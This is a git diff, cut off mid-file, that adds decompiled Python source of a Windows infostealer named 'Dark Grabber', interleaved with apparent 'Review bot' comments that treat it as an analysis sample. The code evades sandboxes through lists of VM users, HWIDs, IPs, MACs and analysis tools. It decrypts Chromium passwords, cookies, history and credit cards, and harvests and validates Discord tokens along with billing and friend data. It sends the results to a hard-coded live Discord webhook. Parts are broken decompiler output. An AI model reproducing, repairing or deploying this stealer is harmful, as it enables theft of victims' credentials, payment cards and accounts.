diff --git a/Random/Dark Grabber/Annexes/Install Dark Grabber.py b/Random/Dark Grabber/Annexes/Install Dark Grabber.py
new file mode 100755
index 0000000..4b876aa
--- /dev/null
+++ b/Random/Dark Grabber/Annexes/Install Dark Grabber.py
@@ -0,0 +1,26 @@
+from components.antidebug import AntiDebug
+from components.browsers import Browsers
+from components.discordtoken import DiscordToken
+from components.injection import Injection
+from components.startup import Startup
+from components.systeminfo import SystemInfo
+from config import __CONFIG__
+
+def main():
+ funcs = [
+ AntiDebug,
+ Browsers,
+ DiscordToken,
+ Injection,
+ Startup,
+ SystemInfo]
+ for func in funcs:
+ if __CONFIG__[func.__name__.lower()]:
+ if func.__init__.__code__.co_argcount == 2:
+ func(__CONFIG__['webhook'])
+ continue
+ func()
+
+if __name__ == '__main__':
+ main()
+ return None
diff --git a/Random/Dark Grabber/Annexes/antidebug.py b/Random/Dark Grabber/Annexes/antidebug.py
new file mode 100755
index 0000000..4fd9476
--- /dev/null
+++ b/Random/Dark Grabber/Annexes/antidebug.py
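Review bot: The module-level `return None` on the last line of `Install Dark Grabber.py` is not valid Python outside a function, so this file — like the `components` files in the same commit, which carry `# Source Generated with Decompyle++` headers and `# WARNING: Decompyle incomplete` markers — is decompiler output rather than runnable source, and nothing in the hunk says so. A first-line comment such as `# Decompiled (Decompyle++) sample of a credential stealer; retained for analysis only, not executable as-is` would stop anyone triaging the repository from mistaking the listing for working code. The dispatch in `main()` also shows that the sample's component set is driven by the boolean keys of `__CONFIG__` and that two-argument components receive the `webhook` value, which is the exfiltration channel worth flagging for detection.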
@@ -0,0 +1,472 @@ +# Source Generated with Decompyle++ +# File: antidebug.pyc (Python 3.10) + +import os +import re +import subprocess +import sys +import uuid +import psutil +import requests +from typing import Literal + +class AntiDebug: + + def __init__(self = None): + if self.checks(): + sys.exit(int()) + return None + + + def checks(self = None): + debugging = False + self.blackListedUsers = [ + 'WDAGUtilityAccount', + 'Abby', + 'hmarc', + 'patex', + 'RDhJ0CNFevzX', + 'kEecfMwgj', + 'Frank', + '8Nl0ColNQ5bq', + 'Lisa', + 'John', + 'george', + 'PxmdUOpVyx', + '8VizSM', + 'w0fjuOVmCcP5A', + 'lmVwjj9b', + 'PqONjHVwexsS', + '3u2v9m8', + 'Julia', + 'HEUeRzl', + 'fred', + 'server', + 'BvJChRPnsxn', + 'Harry Johnson', + 'SqgFOf3G', + 'Lucas', + 'mike', + 'PateX', + 'h7dk1xPr', + 'Louise', + 'User01', + 'test', + 'RGzcBUyrznReg'] + self.blackListedPCNames = [ + 'BEE7370C-8C0C-4', + 'DESKTOP-NAKFFMT', + 'WIN-5E07COS9ALR', + 'B30F0242-1C6A-4', + 'DESKTOP-VRSQLAG', + 'Q9IATRKPRH', + 'XC64ZB', + 'DESKTOP-D019GDM', + 'DESKTOP-WI8CLET', + 'SERVER1', + 'LISA-PC', + 'JOHN-PC', + 'DESKTOP-B0T93D6', + 'DESKTOP-1PYKP29', + 'DESKTOP-1Y2433R', + 'WILEYPC', + 'WORK', + '6C4E733F-C2D9-4', + 'RALPHS-PC', + 'DESKTOP-WG3MYJS', + 'DESKTOP-7XC6GEZ', + 'DESKTOP-5OV9S0O', + 'QarZhrdBpj', + 'ORELEEPC', + 'ARCHIBALDPC', + 'JULIA-PC', + 'd1bnJkfVlH', + 'NETTYPC', + 'DESKTOP-BUGIO', + 'DESKTOP-CBGPFEE', + 'SERVER-PC', + 'TIQIYLA9TW5M', + 'DESKTOP-KALVINO', + 'COMPNAME_4047', + 'DESKTOP-19OLLTD', + 'DESKTOP-DE369SE', + 'EA8C2E2A-D017-4', + 'AIDANPC', + 'LUCAS-PC', + 'MARCI-PC', + 'ACEPC', + 'MIKE-PC', + 'DESKTOP-IAPKN1P', + 'DESKTOP-NTU7VUO', + 'LOUISE-PC', + 'T00917', + 'test42'] + self.blackListedHWIDS = [ + '7AB5C494-39F5-4941-9163-47F54D6D5016', + '03DE0294-0480-05DE-1A06-350700080009', + '11111111-2222-3333-4444-555555555555', + '6F3CA5EC-BEC9-4A4D-8274-11168F640058', + 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548', + '4C4C4544-0050-3710-8058-CAC04F59344A', + 
'00000000-0000-0000-0000-AC1F6BD04972', + '00000000-0000-0000-0000-000000000000', + '5BD24D56-789F-8468-7CDC-CAA7222CC121', + '49434D53-0200-9065-2500-65902500E439', + '49434D53-0200-9036-2500-36902500F022', + '777D84B3-88D1-451C-93E4-D235177420A7', + '49434D53-0200-9036-2500-369025000C65', + 'B1112042-52E8-E25B-3655-6A4F54155DBF', + '00000000-0000-0000-0000-AC1F6BD048FE', + 'EB16924B-FB6D-4FA1-8666-17B91F62FB37', + 'A15A930C-8251-9645-AF63-E45AD728C20C', + '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3', + 'C7D23342-A5D4-68A1-59AC-CF40F735B363', + '63203342-0EB0-AA1A-4DF5-3FB37DBB0670', + '44B94D56-65AB-DC02-86A0-98143A7423BF', + '6608003F-ECE4-494E-B07E-1C4615D1D93C', + 'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A', + '49434D53-0200-9036-2500-369025003AF0', + '8B4E8278-525C-7343-B825-280AEBCD3BCB', + '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27', + '79AF5279-16CF-4094-9758-F88A616D81B4', + 'FF577B79-782E-0A4D-8568-B35A9B7EB76B', + '08C1E400-3C56-11EA-8000-3CECEF43FEDE', + '6ECEAF72-3548-476C-BD8D-73134A9182C8', + '49434D53-0200-9036-2500-369025003865', + '119602E8-92F9-BD4B-8979-DA682276D385', + '12204D56-28C0-AB03-51B7-44A8B7525250', + '63FA3342-31C7-4E8E-8089-DAFF6CE5E967', + '365B4000-3B25-11EA-8000-3CECEF44010C', + 'D8C30328-1B06-4611-8E3C-E433F4F9794E', + '00000000-0000-0000-0000-50E5493391EF', + '00000000-0000-0000-0000-AC1F6BD04D98', + '4CB82042-BA8F-1748-C941-363C391CA7F3', + 'B6464A2B-92C7-4B95-A2D0-E5410081B812', + 'BB233342-2E01-718F-D4A1-E7F69D026428', + '9921DE3A-5C1A-DF11-9078-563412000026', + 'CC5B3F62-2A04-4D2E-A46C-AA41B7050712', + '00000000-0000-0000-0000-AC1F6BD04986', + 'C249957A-AA08-4B21-933F-9271BEC63C85', + 'BE784D56-81F5-2C8D-9D4B-5AB56F05D86E', + 'ACA69200-3C4C-11EA-8000-3CECEF4401AA', + '3F284CA4-8BDF-489B-A273-41B44D668F6D', + 'BB64E044-87BA-C847-BC0A-C797D1A16A50', + '2E6FB594-9D55-4424-8E74-CE25A25E36B0', + '42A82042-3F13-512F-5E3D-6BF4FFFD8518', + '38AB3342-66B0-7175-0B23-F390B3728B78', + '48941AE9-D52F-11DF-BBDA-503734826431', + 
'032E02B4-0499-05C3-0806-3C0700080009', + 'DD9C3342-FB80-9A31-EB04-5794E5AE2B4C', + 'E08DE9AA-C704-4261-B32D-57B2A3993518', + '07E42E42-F43D-3E1C-1C6B-9C7AC120F3B9', + '88DC3342-12E6-7D62-B0AE-C80E578E7B07', + '5E3E7FE0-2636-4CB7-84F5-8D2650FFEC0E', + '96BB3342-6335-0FA8-BA29-E1BA5D8FEFBE', + '0934E336-72E4-4E6A-B3E5-383BD8E938C3', + '12EE3342-87A2-32DE-A390-4C2DA4D512E9', + '38813342-D7D0-DFC8-C56F-7FC9DFE5C972', + '8DA62042-8B59-B4E3-D232-38B29A10964A', + '3A9F3342-D1F2-DF37-68AE-C10F60BFB462', + 'F5744000-3C78-11EA-8000-3CECEF43FEFE', + 'FA8C2042-205D-13B0-FCB5-C5CC55577A35', + 'C6B32042-4EC3-6FDF-C725-6F63914DA7C7', + 'FCE23342-91F1-EAFC-BA97-5AAE4509E173', + 'CF1BE00F-4AAF-455E-8DCD-B5B09B6BFA8F', + '050C3342-FADD-AEDF-EF24-C6454E1A73C9', + '4DC32042-E601-F329-21C1-03F27564FD6C', + 'DEAEB8CE-A573-9F48-BD40-62ED6C223F20', + '05790C00-3B21-11EA-8000-3CECEF4400D0', + '5EBD2E42-1DB8-78A6-0EC3-031B661D5C57', + '9C6D1742-046D-BC94-ED09-C36F70CC9A91', + '907A2A79-7116-4CB6-9FA5-E5A58C4587CD', + 'A9C83342-4800-0578-1EE8-BA26D2A678D2', + 'D7382042-00A0-A6F0-1E51-FD1BBF06CD71', + '1D4D3342-D6C4-710C-98A3-9CC6571234D5', + 'CE352E42-9339-8484-293A-BD50CDC639A5', + '60C83342-0A97-928D-7316-5F1080A78E72', + '02AD9898-FA37-11EB-AC55-1D0C0A67EA8A', + 'DBCC3514-FA57-477D-9D1F-1CAF4CC92D0F', + 'FED63342-E0D6-C669-D53F-253D696D74DA', + '2DD1B176-C043-49A4-830F-C623FFB88F3C', + '4729AEB0-FC07-11E3-9673-CE39E79C8A00', + '84FE3342-6C67-5FC6-5639-9B3CA3D775A1', + 'DBC22E42-59F7-1329-D9F2-E78A2EE5BD0D', + 'CEFC836C-8CB1-45A6-ADD7-209085EE2A57', + 'A7721742-BE24-8A1C-B859-D7F8251A83D3', + '3F3C58D1-B4F2-4019-B2A2-2A500E96AF2E', + 'D2DC3342-396C-6737-A8F6-0C6673C1DE08', + 'EADD1742-4807-00A0-F92E-CCD933E9D8C1', + 'AF1B2042-4B90-0000-A4E4-632A1C8C7EB1', + 'FE455D1A-BE27-4BA4-96C8-967A6D3A9661', + '921E2042-70D3-F9F1-8CBD-B398A21F89C6'] + self.blackListedIPS = [ + '88.132.231.71', + '78.139.8.50', + '20.99.160.173', + '88.153.199.169', + '84.147.62.12', + '194.154.78.160', + 
'92.211.109.160', + '195.74.76.222', + '188.105.91.116', + '34.105.183.68', + '92.211.55.199', + '79.104.209.33', + '95.25.204.90', + '34.145.89.174', + '109.74.154.90', + '109.145.173.169', + '34.141.146.114', + '212.119.227.151', + '195.239.51.59', + '192.40.57.234', + '64.124.12.162', + '34.142.74.220', + '188.105.91.173', + '109.74.154.91', + '34.105.72.241', + '109.74.154.92', + '213.33.142.50', + '109.74.154.91', + '93.216.75.209', + '192.87.28.103', + '88.132.226.203', + '195.181.175.105', + '88.132.225.100', + '92.211.192.144', + '34.83.46.130', + '188.105.91.143', + '34.85.243.241', + '34.141.245.25', + '178.239.165.70', + '84.147.54.113', + '193.128.114.45', + '95.25.81.24', + '92.211.52.62', + '88.132.227.238', + '35.199.6.13', + '80.211.0.97', + '34.85.253.170', + '23.128.248.46', + '35.229.69.227', + '34.138.96.23', + '192.211.110.74', + '35.237.47.12', + '87.166.50.213', + '34.253.248.228', + '212.119.227.167', + '193.225.193.201', + '34.145.195.58', + '34.105.0.27', + '195.239.51.3', + '35.192.93.107'] + self.blackListedMacs = [ + '00:15:5d:00:07:34', + '00:e0:4c:b8:7a:58', + '00:0c:29:2c:c1:21', + '00:25:90:65:39:e4', + 'c8:9f:1d:b6:58:e4', + '00:25:90:36:65:0c', + '00:15:5d:00:00:f3', + '2e:b8:24:4d:f7:de', + '00:15:5d:13:6d:0c', + '00:50:56:a0:dd:00', + '00:15:5d:13:66:ca', + '56:e8:92:2e:76:0d', + 'ac:1f:6b:d0:48:fe', + '00:e0:4c:94:1f:20', + '00:15:5d:00:05:d5', + '00:e0:4c:4b:4a:40', + '42:01:0a:8a:00:22', + '00:1b:21:13:15:20', + '00:15:5d:00:06:43', + '00:15:5d:1e:01:c8', + '00:50:56:b3:38:68', + '60:02:92:3d:f1:69', + '00:e0:4c:7b:7b:86', + '00:e0:4c:46:cf:01', + '42:85:07:f4:83:d0', + '56:b0:6f:ca:0a:e7', + '12:1b:9e:3c:a6:2c', + '00:15:5d:00:1c:9a', + '00:15:5d:00:1a:b9', + 'b6:ed:9d:27:f4:fa', + '00:15:5d:00:01:81', + '4e:79:c0:d9:af:c3', + '00:15:5d:b6:e0:cc', + '00:15:5d:00:02:26', + '00:50:56:b3:05:b4', + '1c:99:57:1c:ad:e4', + '08:00:27:3a:28:73', + '00:15:5d:00:00:c3', + '00:50:56:a0:45:03', + '12:8a:5c:2a:65:d1', + 
'00:25:90:36:f0:3b', + '00:1b:21:13:21:26', + '42:01:0a:8a:00:22', + '00:1b:21:13:32:51', + 'a6:24:aa:ae:e6:12', + '08:00:27:45:13:10', + '00:1b:21:13:26:44', + '3c:ec:ef:43:fe:de', + 'd4:81:d7:ed:25:54', + '00:25:90:36:65:38', + '00:03:47:63:8b:de', + '00:15:5d:00:05:8d', + '00:0c:29:52:52:50', + '00:50:56:b3:42:33', + '3c:ec:ef:44:01:0c', + '06:75:91:59:3e:02', + '42:01:0a:8a:00:33', + 'ea:f6:f1:a2:33:76', + 'ac:1f:6b:d0:4d:98', + '1e:6c:34:93:68:64', + '00:50:56:a0:61:aa', + '42:01:0a:96:00:22', + '00:50:56:b3:21:29', + '00:15:5d:00:00:b3', + '96:2b:e9:43:96:76', + 'b4:a9:5a:b1:c6:fd', + 'd4:81:d7:87:05:ab', + 'ac:1f:6b:d0:49:86', + '52:54:00:8b:a6:08', + '00:0c:29:05:d8:6e', + '00:23:cd:ff:94:f0', + '00:e0:4c:d6:86:77', + '3c:ec:ef:44:01:aa', + '00:15:5d:23:4c:a3', + '00:1b:21:13:33:55', + '00:15:5d:00:00:a4', + '16:ef:22:04:af:76', + '00:15:5d:23:4c:ad', + '1a:6c:62:60:3b:f4', + '00:15:5d:00:00:1d', + '00:50:56:a0:cd:a8', + '00:50:56:b3:fa:23', + '52:54:00:a0:41:92', + '00:50:56:b3:f6:57', + '00:e0:4c:56:42:97', + 'ca:4d:4b:ca:18:cc', + 'f6:a5:41:31:b2:78', + 'd6:03:e4:ab:77:8e', + '00:50:56:ae:b2:b0', + '00:50:56:b3:94:cb', + '42:01:0a:8e:00:22', + '00:50:56:b3:4c:bf', + '00:50:56:b3:09:9e', + '00:50:56:b3:38:88', + '00:50:56:a0:d0:fa', + '00:50:56:b3:91:c8', + '3e:c1:fd:f1:bf:71', + '00:50:56:a0:6d:86', + '00:50:56:a0:af:75', + '00:50:56:b3:dd:03', + 'c2:ee:af:fd:29:21', + '00:50:56:b3:ee:e1', + '00:50:56:a0:84:88', + '00:1b:21:13:32:20', + '3c:ec:ef:44:00:d0', + '00:50:56:ae:e5:d5', + '00:50:56:97:f6:c8', + '52:54:00:ab:de:59', + '00:50:56:b3:9e:9e', + '00:50:56:a0:39:18', + '32:11:4d:d0:4a:9e', + '00:50:56:b3:d0:a7', + '94:de:80:de:1a:35', + '00:50:56:ae:5d:ea', + '00:50:56:b3:14:59', + 'ea:02:75:3c:90:9f', + '00:e0:4c:44:76:54', + 'ac:1f:6b:d0:4d:e4', + '52:54:00:3b:78:24', + '00:50:56:b3:50:de', + '7e:05:a3:62:9c:4d', + '52:54:00:b3:e4:71', + '90:48:9a:9d:d5:24', + '00:50:56:b3:3b:a6', + '92:4c:a8:23:fc:2e', + '5a:e2:a6:a4:44:db', + '00:50:56:ae:6f:54', 
+ '42:01:0a:96:00:33', + '00:50:56:97:a1:f8', + '5e:86:e4:3d:0d:f6', + '00:50:56:b3:ea:ee', + '3e:53:81:b7:01:13', + '00:50:56:97:ec:f2', + '00:e0:4c:b3:5a:2a', + '12:f8:87:ab:13:ec', + '00:50:56:a0:38:06', + '2e:62:e8:47:14:49', + '00:0d:3a:d2:4f:1f', + '60:02:92:66:10:79', + '', + '00:50:56:a0:d7:38', + 'be:00:e5:c5:0c:e5', + '00:50:56:a0:59:10', + '00:50:56:a0:06:8d', + '00:e0:4c:cb:62:08', + '4e:81:81:8e:22:4e'] + self.blacklistedProcesses = [ + 'httpdebuggerui', + 'wireshark', + 'fiddler', + 'regedit', + 'cmd', + 'taskmgr', + 'vboxservice', + 'df5serv', + 'processhacker', + 'vboxtray', + 'vmtoolsd', + 'vmwaretray', + 'ida64', + 'ollydbg', + 'pestudio', + 'vmwareuser', + 'vgauthservice', + 'vmacthlp', + 'x96dbg', + 'vmsrvc', + 'x32dbg', + 'vmusrvc', + 'prl_cc', + 'prl_tools', + 'xenservice', + 'qemu-ga', + 'joeboxcontrol', + 'ksdumperclient', + 'ksdumper', + 'joeboxserver'] + self.check_process() + if self.get_network(): + debugging = True + if self.get_system(): + debugging = True + return debugging + + + def check_process(self = None): + pass + # WARNING: Decompyle incomplete + + + def get_network(self = None): + ip = requests.get('https://api.ipify.org').text + mac = ':'.join(re.findall('..', '%012x' % uuid.getnode())) + if ip in self.blackListedIPS: + return True + if None in self.blackListedMacs: + return True + + + def get_system(self = None): + hwid = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', True, subprocess.PIPE, subprocess.PIPE, **('shell', 'stdin', 'stderr')).decode('utf-8').split('\n')[1].strip() + username = os.getenv('UserName') + hostname = os.getenv('COMPUTERNAME') + for i in zip(self.blackListedHWIDS, self.blackListedUsers, self.blackListedPCNames): + if hwid in i and username in i or hostname in i: + return True + return None + + diff --git a/Random/Dark Grabber/Annexes/browsers.py b/Random/Dark Grabber/Annexes/browsers.py new file mode 100755 index 0000000..799e6cb --- /dev/null 
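Review bot: The sandbox-evasion blacklists built in `AntiDebug.checks()` (usernames, hostnames, HWIDs, public IPs, MAC addresses and analysis-tool process names) are the most useful part of this hunk for defenders and are left entirely uncommented. A comment at the top of `checks()` stating that these are known sandbox/analysis-environment fingerprints the sample refuses to run under, and that `__init__` calls `sys.exit(int())` (exit status 0) when any check fires, would make the file readable as the analysis artefact it is. The two externally observable behaviours — the request to `https://api.ipify.org` in `get_network()` and the `WMIC.exe csproduct get uuid` child process in `get_system()` — belong in that comment as detection signals. `check_process()` has no body (`# WARNING: Decompyle incomplete`), so the process-name list is never consulted in this listing, and the `None in self.blackListedMacs` comparison in `get_network()` is a Decompyle++ artefact; the header should say the code is non-executable decompiled output.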
+++ b/Random/Dark Grabber/Annexes/browsers.py 
@@ -0,0 +1,261 @@ +# Source Generated with Decompyle++ +# File: browsers.pyc (Python 3.10) + +import base64 +import json +import os +import shutil +import sqlite3 +from pathlib import Path +from zipfile import ZipFile +from Crypto.Cipher import AES +from discord import Embed, File, SyncWebhook +from win32crypt import CryptUnprotectData +__LOGINS__ = [] +__COOKIES__ = [] +__WEB_HISTORY__ = [] +__DOWNLOADS__ = [] +__CARDS__ = [] + +class Browsers: + + def __init__(self, webhook): + self.webhook = SyncWebhook.from_url(webhook) + Chromium() + Upload(self.webhook) + + + +class Upload: + + def __init__(self = None, webhook = None): + self.webhook = webhook + self.write_files() + self.send() + self.clean() + + + def write_files(self): + os.makedirs('vault', True, **('exist_ok',)) + # WARNING: Decompyle incomplete + + + def send(self): + self.webhook.send(Embed('Vault', '```' + '\n'.join(self.tree(Path('vault'))) + '```', **('title', 'description')), File('vault.zip'), **('embed', 'file')) + + + def clean(self): + shutil.rmtree('vault') + os.remove('vault.zip') + + + def tree(self = None, path = None, prefix = None, midfix_folder = ('', '\xf0\x9f\x93\x82 - ', '\xf0\x9f\x93\x84 - '), midfix_file = ('path', Path, 'prefix', str, 'midfix_folder', str, 'midfix_file', str)): + pass + # WARNING: Decompyle incomplete + + + +class Chromium: + + def __init__(self): + self.appdata = os.getenv('LOCALAPPDATA') + # WARNING: Decompyle incomplete + + + def get_master_key(self = None, path = None): + with open(path, 'r', 'utf-8', **('encoding',)) as f: + c = f.read() + None(None, None, None) + # WARNING: Decompyle incomplete + + + def decrypt_password(self = None, buff = None, master_key = None): + iv = buff[3:15] + payload = buff[15:] + cipher = AES.new(master_key, AES.MODE_GCM, iv) + decrypted_pass = cipher.decrypt(payload) + decrypted_pass = decrypted_pass[:-16].decode() + return decrypted_pass + + + def get_login_data(self = None, path = None, profile = None): + login_db = 
f'''{path}\\{profile}\\Login Data''' + if not os.path.exists(login_db): + return None + None.copy(login_db, 'login_db') + conn = sqlite3.connect('login_db') + cursor = conn.cursor() + cursor.execute('SELECT action_url, username_value, password_value FROM logins') + for row in cursor.fetchall(): + if not row[0] and row[1] or row[2]: + continue + password = self.decrypt_password(row[2], self.master_key) + __LOGINS__.append(Types.Login(row[0], row[1], password)) + conn.close() + os.remove('login_db') + + + def get_cookies(self = None, path = None, profile = None): + cookie_db = f'''{path}\\{profile}\\Network\\Cookies''' + if not os.path.exists(cookie_db): + return None + None.copy(cookie_db, 'cookie_db') + conn = sqlite3.connect('cookie_db') + cursor = conn.cursor() + cursor.execute('SELECT host_key, name, path, encrypted_value,expires_utc FROM cookies') + for row in cursor.fetchall(): + if not row[0] and row[1] and row[2] or row[3]: + continue + cookie = self.decrypt_password(row[3], self.master_key) + __COOKIES__.append(Types.Cookie(row[0], row[1], row[2], cookie, row[4])) + conn.close() + os.remove('cookie_db') + + + def get_web_history(self = None, path = None, profile = None): + web_history_db = f'''{path}\\{profile}\\History''' + if not os.path.exists(web_history_db): + return None + None.copy(web_history_db, 'web_history_db') + conn = sqlite3.connect('web_history_db') + cursor = conn.cursor() + cursor.execute('SELECT url, title, last_visit_time FROM urls') + for row in cursor.fetchall(): + if not row[0] and row[1] or row[2]: + continue + __WEB_HISTORY__.append(Types.WebHistory(row[0], row[1], row[2])) + conn.close() + os.remove('web_history_db') + + + def get_downloads(self = None, path = None, profile = None): + downloads_db = f'''{path}\\{profile}\\History''' + if not os.path.exists(downloads_db): + return None + None.copy(downloads_db, 'downloads_db') + conn = sqlite3.connect('downloads_db') + cursor = conn.cursor() + cursor.execute('SELECT site_url, 
tab_url, target_path, last_access_time FROM downloads') + for row in cursor.fetchall(): + if not row[0] and row[1] and row[2] or row[3]: + continue + __DOWNLOADS__.append(Types.Download(row[0], row[1], row[2], row[3])) + conn.close() + os.remove('downloads_db') + + + def get_credit_cards(self = None, path = None, profile = None): + cards_db = f'''{path}\\{profile}\\Web Data''' + if not os.path.exists(cards_db): + return None + None.copy(cards_db, 'cards_db') + conn = sqlite3.connect('cards_db') + cursor = conn.cursor() + cursor.execute('SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards') + for row in cursor.fetchall(): + if not row[0] and row[1] and row[2] or row[3]: + continue + card_number = self.decrypt_password(row[3], self.master_key) + __CARDS__.append(Types.CreditCard(row[0], row[1], row[2], card_number, row[4])) + conn.close() + os.remove('cards_db') + + + +class Types: + + class Login: + __qualname__ = 'Types.Login' + + def __init__(self, url, username, password): + self.url = url + self.username = username + self.password = password + + + def __str__(self): + return f'''{self.url}\t{self.username}\t{self.password}''' + + + def __repr__(self): + return self.__str__() + + + + class Cookie: + __qualname__ = 'Types.Cookie' + + def __init__(self, host, name, path, value, expires): + self.host = host + self.name = name + self.path = path + self.value = value + self.expires = expires + + + def __str__(self): + return f'''{self.host}\t{'FALSE' if self.expires == 0 else 'TRUE'}\t{self.path}\t{'FALSE' if self.host.startswith('.') else 'TRUE'}\t{self.expires}\t{self.name}\t{self.value}''' + + + def __repr__(self): + return self.__str__() + + + + class WebHistory: + __qualname__ = 'Types.WebHistory' + + def __init__(self, url, title, timestamp): + self.url = url + self.title = title + self.timestamp = timestamp + + + def __str__(self): + return f'''{self.url}\t{self.title}\t{self.timestamp}''' + + + def 
__repr__(self): + return self.__str__() + + + + class Download: + __qualname__ = 'Types.Download' + + def __init__(self, site_url, tab_url, target_path, last_access_time): + self.site_url = site_url + self.tab_url = tab_url + self.target_path = target_path + self.last_access_time = last_access_time + + + def __str__(self): + return f'''{self.site_url}\t{self.tab_url}\t{self.target_path}\t{self.last_access_time}''' + + + def __repr__(self): + return self.__str__() + + + + class CreditCard: + __qualname__ = 'Types.CreditCard' + + def __init__(self, name, month, year, number, date_modified): + self.name = name + self.month = month + self.year = year + self.number = number + self.date_modified = date_modified + + + def __str__(self): + return f'''{self.name}\t{self.month}\t{self.year}\t{self.number}\t{self.date_modified}''' + + + def __repr__(self): + return self.__str__() + + + diff --git a/Random/Dark Grabber/Annexes/config.py b/Random/Dark Grabber/Annexes/config.py new file mode 100755 index 0000000..ebe4370 --- /dev/null +++ b/Random/Dark Grabber/Annexes/config.py @@ -0,0 +1,11 @@ +# Source Generated with Decompyle++ +# File: config.pyc (Python 3.10) + +__CONFIG__ = { + 'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp', + 'antidebug': True, + 'browsers': True, + 'discordtoken': True, + 'injection': True, + 'startup': True, + 'systeminfo': True } diff --git a/Random/Dark Grabber/Annexes/discordtoken.py b/Random/Dark Grabber/Annexes/discordtoken.py new file mode 100755 index 0000000..fb9fcc5 --- /dev/null +++ b/Random/Dark Grabber/Annexes/discordtoken.py 
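Review bot: `Chromium.get_login_data()`, `get_cookies()`, `get_web_history()`, `get_downloads()` and `get_credit_cards()` each copy a Chromium profile database (`Login Data`, `Network\Cookies`, `History`, `Web Data`) to a fixed file name in the current working directory (`login_db`, `cookie_db`, `web_history_db`, `downloads_db`, `cards_db`) before querying it, and `Upload` stages the results in `vault/` and `vault.zip` before sending them to a Discord webhook; none of this is documented. Those fixed file names, together with the `CryptUnprotectData` import and the `AES.MODE_GCM` decrypt in `decrypt_password()`, are the concrete host artefacts a detection rule for this sample can key on, and a class-level docstring on `Chromium` and `Upload` should list them. The listing is not executable as checked in (`None.copy(...)` and `**('encoding',)` are Decompyle++ artefacts, and `get_master_key()`, `write_files()` and `tree()` are marked `Decompyle incomplete`), which the file header should state explicitly.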
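Review bot: `config.py` commits a hard-coded Discord webhook URL under the `webhook` key; that URL is a live exfiltration endpoint and an indicator of compromise, not configuration that belongs in a public repository. It should be replaced with an obviously labelled placeholder (`'webhook': '<REDACTED_WEBHOOK_URL>'`), with the real value reported to Discord for revocation and recorded in the project's IoC list instead. The remaining keys are the per-component enable flags read by `main()` in `Install Dark Grabber.py`, and a one-line comment saying so would make the file self-explanatory.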
@@ -0,0 +1,245 @@ +# Source Generated with Decompyle++ +# File: discordtoken.pyc (Python 3.10) + +import base64 +import json +import os +import re +import requests +from Crypto.Cipher import AES +from discord import Embed, SyncWebhook +from win32crypt import CryptUnprotectData + +class DiscordToken: + + def __init__(self, webhook): + upload_tokens(webhook).upload() + + + +class extract_tokens: + + def __init__(self = None): + self.base_url = 'https://discord.com/api/v9/users/@me' + self.appdata = os.getenv('localappdata') + self.roaming = os.getenv('appdata') + self.regexp = '[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}' + self.regexp_enc = 'dQw4w9WgXcQ:[^\\"]*' + self.tokens = [] + self.uids = [] + self.extract() + + + def extract(self = None): + pass + # WARNING: Decompyle incomplete + + + def validate_token(self = None, token = None): + r = requests.get(self.base_url, { + 'Authorization': token }, **('headers',)) + if r.status_code == 200: + return True + + + def decrypt_val(self = None, buff = None, master_key = None): + iv = buff[3:15] + payload = buff[15:] + cipher = AES.new(master_key, AES.MODE_GCM, iv) + decrypted_pass = cipher.decrypt(payload) + decrypted_pass = decrypted_pass[:-16].decode() + return decrypted_pass + + + def get_master_key(self = None, path = None): + with open(path, 'r', 'utf-8', **('encoding',)) as f: + c = f.read() + None(None, None, None) + # WARNING: Decompyle incomplete + + + +class upload_tokens: + + def __init__(self = None, webhook = None): + self.tokens = extract_tokens().tokens + self.webhook = SyncWebhook.from_url(webhook) + + + def calc_flags(self = None, flags = None): + flags_dict = { + 'DISCORD_EMPLOYEE': { + 'emoji': '<:staff:968704541946167357>', + 'shift': 0, + 'ind': 1 }, + 'DISCORD_PARTNER': { + 'emoji': '<:partner:968704542021652560>', + 'shift': 1, + 'ind': 2 }, + 'HYPESQUAD_EVENTS': { + 'emoji': '<:hypersquad_events:968704541774192693>', + 'shift': 2, + 'ind': 4 }, + 'BUG_HUNTER_LEVEL_1': { + 'emoji': 
'<:bug_hunter_1:968704541677723648>', + 'shift': 3, + 'ind': 4 }, + 'HOUSE_BRAVERY': { + 'emoji': '<:hypersquad_1:968704541501571133>', + 'shift': 6, + 'ind': 64 }, + 'HOUSE_BRILLIANCE': { + 'emoji': '<:hypersquad_2:968704541883261018>', + 'shift': 7, + 'ind': 128 }, + 'HOUSE_BALANCE': { + 'emoji': '<:hypersquad_3:968704541874860082>', + 'shift': 8, + 'ind': 256 }, + 'EARLY_SUPPORTER': { + 'emoji': '<:early_supporter:968704542126510090>', + 'shift': 9, + 'ind': 512 }, + 'BUG_HUNTER_LEVEL_2': { + 'emoji': '<:bug_hunter_2:968704541774217246>', + 'shift': 14, + 'ind': 16384 }, + 'VERIFIED_BOT_DEVELOPER': { + 'emoji': '<:verified_dev:968704541702905886>', + 'shift': 17, + 'ind': 131072 }, + 'CERTIFIED_MODERATOR': { + 'emoji': '<:certified_moderator:988996447938674699>', + 'shift': 18, + 'ind': 262144 }, + 'SPAMMER': { + 'emoji': '\xe2\x8c\xa8', + 'shift': 20, + 'ind': 1048704 } } + return (lambda .0 = None: [ [ +flags_dict[flag]['emoji'], +flags_dict[flag]['ind']] for flag in .0 if int(flags) & 1 << flags_dict[flag]['shift'] ])(flags_dict) + + + def upload(self): + if not self.tokens: + return None + for token in None.tokens: + user = requests.get('https://discord.com/api/v8/users/@me', { + 'Authorization': token }, **('headers',)).json() + billing = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', { + 'Authorization': token }, **('headers',)).json() + guilds = requests.get('https://discord.com/api/v9/users/@me/guilds?with_counts=true', { + 'Authorization': token }, **('headers',)).json() + friends = requests.get('https://discord.com/api/v8/users/@me/relationships', { + 'Authorization': token }, **('headers',)).json() + gift_codes = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', { + 'Authorization': token }, **('headers',)).json() + username = user['username'] + '#' + user['discriminator'] + user_id = user['id'] + email = user['email'] + phone = user['phone'] + mfa = user['mfa_enabled'] + avatar = 
